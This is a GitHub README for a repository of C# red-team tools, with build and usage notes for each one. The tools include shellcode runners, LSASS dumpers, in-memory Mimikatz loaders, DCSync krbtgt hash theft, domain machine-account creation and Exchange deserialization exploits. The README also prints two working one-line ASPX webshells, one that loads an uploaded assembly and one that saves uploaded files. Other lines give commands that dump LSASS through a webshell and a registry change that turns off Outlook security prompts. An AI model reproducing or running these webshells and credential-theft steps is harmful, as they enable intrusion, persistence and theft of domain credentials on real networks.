Skip to content

Latest commit

 

History

History
659 lines (391 loc) · 14.5 KB

README.md

File metadata and controls

659 lines (391 loc) · 14.5 KB

Homework-of-C-Sharp

C Sharp codes of my blog.


Shellcode.cs

Use CreateThread to run shellcode.

ShellcodeBase64.txt

Base64 of the shellcode(msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp)

ReadShellcode.cs

It will read ShellcodeBase64.txt and launch the shellcode.


DumpLsass.cs

Source code is /~https://github.com/GhostPack/SafetyKatz

Remove some functions of the source code,only used of dumping lsass.exe to the current path.

Complie:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe DumpLsass.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe DumpLsass.cs

SafetyKatz.cs

Use to run sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file of lsass.exe.

All code from /~https://github.com/GhostPack/SafetyKatz

I just modified a few lines of code so that it can be compiled by csc.exe.

Eg.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SafetyKatz.cs /unsafe

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SafetyKatz.cs /unsafe


GzipandBase64.cs

Use to generate the KatzCompressed string in PELoaderofMimikatz.cs

Complie:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe GzipandBase64.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe GzipandBase64.cs

PELoaderofMimikatz.cs

The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).

I change it to the new version(mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).

The source code supprot 4.0 or later.

This code supprot 3.5 or later.

Complie:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe PELoaderofMimikatz.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe PELoaderofMimikatz.cs

DcsyncofMimikatz.cs

This is the dcsync mode extracted from Mimikatz.

The source code in KatzCompressed is /~https://github.com/3gstudent/test/blob/master/Mimkatz-dcsync.zip

You can use /~https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/GzipandBase64.cs to generate the KatzCompressed string.

The source code supprot 4.0 or later.

This code supprot 3.5 or later.

Complie:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe DcsyncofMimikatz.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe DcsyncofMimikatz.cs

Usage:

DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /all /csv" exit

DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /user:administrator /csv" exit


SharpMimikatz_x86.cs

Reference:Casey Smith's PELoader.cs

The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).

I change it to the new version(mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).

The source code supprot 4.0 or later.

This code supprot 3.5 or later.

This is a 32-bit version.

Complie:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs

or

C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs

Usage:

SharpMimikatz_x86.exe coffee exit

SharpMimikatz_x64.cs

Reference:Casey Smith's PELoader.cs

The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).

I change it to the new version(mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).

The source code supprot 4.0 or later.

This code supprot 3.5 or later.

This is a 64-bit version.

Complie:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs

Usage:

SharpMimikatz_x64.exe coffee exit

SharpPELoaderGenerater.cs

Use to generate SharpPELoader.cs

Modified by 3gstudent

Reference:Casey Smith's PELoader.cs

Usage:

SharpPELoaderGenerater.exe <exe path>

Eg.

SharpPELoaderGenerater.exe mimikatz.exe

SharpPELoaderGenerater will determine whether the exe is 32-bit or 64-bit and then generate the corresponding code.

More details:

《通过.NET实现内存加载PE文件》


AddMachineAccountofDomain.cs

Reference:/~https://github.com/pkb1s/SharpAllowedToAct

This code is just part of SharpAllowedToAct.

It can be used to add a Machine Account(User:testNew,Password:123456789).

This code can be complied by csc.exe or Visual Studio.

Supprot .Net 3.5 or later.

Complie:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll


mapi_tool.cs

Use MAPI to manage Outlook.

This code can be complied by csc.exe or Visual Studio.

Supprot .Net 3.5 or later.

Complie:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll

Usage:
     mapi_tool.exe GetAllFolders
     mapi_tool.exe GetConfig
     mapi_tool.exe ListMail <folder>
     mapi_tool.exe ListUnreadMail <folder>
Ex command:
     mapi_tool.exe GetConfigEx
     mapi_tool.exe GetContactsEx
     mapi_tool.exe GetGlobalAddressEx  
     mapi_tool.exe ListMailEx <folder>
     mapi_tool.exe ListUnreadMailEx <folder>
     mapi_tool.exe SaveAttachment <folder> <EntryID>  
     <folder>:Inbox/Drafts/SentItems/DeletedItems/Outlook/JunkEmail
Note:
     When the antivirus software is inactive or out-of-date,running Ex command will pop up a Outlook security prompt.
     You can modify the registry to turn off the Outlook security prompt.
     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\x.0\Outlook\Security,DWORD:ObjectModelGuard,2

Office14-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll

Use for Outlook 2010.

Office15-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll

Use for Outlook 2013.


BrailleToASCII.cs

Use to translate Braille Patterns to ASCII characters.

Support:1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ),!/-.?;'$

This code can be complied by csc.exe or Visual Studio.

Supprot .Net 3.5 or later.

Complie:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe BrailleToASCII.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe BrailleToASCII.cs


SSLCertScan

Use to scan the website SSL certificate.

Reference:/~https://github.com/ryanries/SharpTLSScan

This code can be complied by csc.exe or Visual Studio.

Supprot .Net 3.5 or later.

Complie:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SSLCertScan.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SSLCertScan.cs

SharpSSHCheck_SSH.NET.cs

Use to check the valid credential of SSH(Based on SSH.NET).

Support password and privatekeyfile.

Reference:/~https://github.com/sshnet/SSH.NET

Note:

You need to reference Renci.SshNet.dll.

You can download Renci.SshNet.dll from /~https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip

Complie:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHCheck_SSH.NET.cs /r:Renci.SshNet.dll

Usage:

      SharpSSHCheck_SSH.NET.exe <SSH ServerIP> <SSH ServerPort> <mode> <user> <password>
      <mode>:
      - plaintext
      - keyfile

Eg:

      SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 plaintext root toor
      SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa

SharpSSHRunCmd_SSH.NET

Remote command execution via SSH(Based on SSH.NET).

Support password and privatekeyfile.

Reference:/~https://github.com/sshnet/SSH.NET

Note:

You need to reference Renci.SshNet.dll.

You can download Renci.SshNet.dll from /~https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip

Complie:

      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHRunCmd_SSH.NET.cs /r:Renci.SshNet.dll

Usage:

      SharpSSHRunCmd_SSH.NET.exe <SSH ServerIP> <SSH ServerPort> <mode> <user> <password> <cmd>
      <mode>:
      - plaintext
      - keyfile
If the <cmd> is shell,you will get an interactive shell.

Eg:

      SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 plaintext root toor shell
      SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa ps

ListUserMailbyLDAP

Use to export all users' mail by LDAP.

Modified from /~https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts/blob/master/enumerateuser.cs

Complie:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll

Usage:

      ListUserMailbyLDAP <LDAP ServerIP> <user> <password>

Eg:

      ListUserMailbyLDAP.exe 192.168.1.1 test1 password1

List_passwordneverexpires_user_byLDAP

Use to export all users with password_never_expires by LDAP.

Complie:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll

Usage:

      List_passwordneverexpires_user_byLDAP <LDAP ServerIP> <user> <password>

Eg:

      List_passwordneverexpires_user_byLDAP.exe 192.168.1.1 test1 password1

Add_passwordneverexpires_user_byLDAP

Use to set the selected user with password_never_expires by LDAP.

Complie:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll

Usage:

      Add_passwordneverexpires_user_byLDAP <LDAP ServerIP> <user> <password> <target user> 

Eg:

      Add_passwordneverexpires_user_byLDAP.exe 192.168.1.1 administrator password1 test1

SqlClient.cs

From:/~https://github.com/FortyNorthSecurity/SqlClient

Use to query the MSSQL database.

Complie:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SqlClient.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SqlClient.cs

SharpADFindDemo.cs

Use to export the AD data by LDAP. Complie:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll

Usage:

      SharpADFindDemo <LDAP ServerIP> <user> <password> <command>
            
command:
- user
- machine
- group
- ou
- username
- machinename
- groupname
- ouname

Note:The maxsize is 1000.

Eg:

      SharpADFindDemo.exe 192.168.1.1 test1 password1 user

SharpExchangeBackdoor.cs

Python Version: SharpExchangeBackdoor.py

Use to send payload to the Exchange webshell backdoor.

Support:

  • assemblyLoad
  • webshellWrite

Usage:

    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

eg.

    SharpExchangeBackdoor.exe https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
    SharpExchangeBackdoor.exe https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx

assemblyLoad.aspx:

<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>

webshellWrite.aspx:

<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>

XamlToViewState.cs

Use to create viewstate from XAML file

Usage:

    <xaml path> <generator> <key>

eg.

XamlToViewState.exe Run-Calc.xml 042A94E8 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF

SerializeXamlToViewState.cs

Use to create viewstate from Serialize Xaml data.

SharpExchangeDeserializeShell-NoAuth-Fromzcgonvh.cs

SharpExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.cs

SharpExchangeDeserializeShell-NoAuth-ghostfile.cs

Code from /~https://github.com/zcgonvh/CVE-2020-0688/blob/master/ExchangeCmd.cs

Use to test the deserializing code execution of Exchange.
From read and write permissions of Exchange files to deserializing code execution. You should modify the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy<path>\web.config to implement deserializing code execution. <path>:owa or ecp Usage:

    <url> <key> <path>

eg.

    192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
    mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp    

SharpExchangeDumpHash.cs

Use to send payload to the Exchange webshell backdoor. The communication is encrypted by AES.

Support function:

  • generate : generate the webshell
  • dumplsass: save the dump file of LSASS to C:\Windows\Temp\lsass.bin
  • parsedump: use mimikatz to load C:\Windows\Temp\lsass.bin and save the results to C:\Windows\Temp\mimikatz.log

Usage:

    <url> <user> <password> <mode>

mode:

  • generate
  • dumplsass
  • parsedump

eg.

    SharpExchangeDumpHash.exe https://192.168.1.1/owa/auth/1.aspx no auth dumplsass
    SharpExchangeDumpHash.exe https://192.168.1.1/ecp/Education.aspx user1 123456 parsedump

SharpDCSync_krbtgt.cs

Use DRSR protocol to ask a domain controller to get the krbtgt's hash.

Reference:/~https://github.com/vletoux/MakeMeEnterpriseAdmin

SharpDCSync.cs

use DRSR protocol to ask a domain controller to synchronize a specified entry.

Reference:/~https://github.com/vletoux/MakeMeEnterpriseAdmin


SharpTGTImporter.cs

Use to import the TGT

Reference:/~https://github.com/vletoux/MakeMeEnterpriseAdmin


SharpGetUserLoginIPRPC.cs

Use RPC to get the login IP of domain users through the event log.

Support local and remote access

SharpGetUserLoginIPWMI.cs

Use WMI to get the login IP of domain users through the event log.

Support local and remote access